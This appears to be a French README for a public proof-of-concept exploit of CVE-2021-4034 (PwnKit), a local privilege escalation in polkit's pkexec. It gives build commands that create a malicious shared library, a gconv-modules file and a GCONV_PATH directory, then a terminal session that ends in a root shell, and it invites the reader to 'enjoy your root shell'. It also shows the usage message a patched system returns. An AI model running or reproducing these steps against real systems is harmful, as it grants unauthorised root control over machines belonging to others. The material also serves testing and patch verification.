
Exploit pour CVE-2021-4034, une élévation de privilèges locale dans pkexec de polkit, fournissant un shell root via une bibliothèque partagée et une manipulation du chemin GCONV.
Un jour pour l'exploit d'élévation de privilèges polkit
Exécutez simplement make, ./cve-2021-4034 et profitez de votre shell root.
L'avis original des véritables auteurs est ici
Si l'exploit fonctionne, vous obtiendrez un shell root immédiatement :
localuser@ubuntu-poc:~/CVE-2021-4034$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall cve-2021-4034.c -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp /usr/bin/true GCONV_PATH=./pwnkit.so:.
localuser@ubuntu-poc:~/CVE-2021-4034$ ./cve-2021-4034
# whoami
root
# exit
La mise à jour de polkit sur la plupart des systèmes corrigera l'exploit, vous obtiendrez donc l'utilisation et le programme se terminera :
localuser@ubuntu-poc:~/CVE-2021-4034$ ./cve-2021-4034
pkexec --version |
--help |
--disable-internal-agent |
[--user username] PROGRAM [ARGUMENTS...]
See the pkexec manual page for more details.
localuser@ubuntu-poc:~/CVE-2021-4034$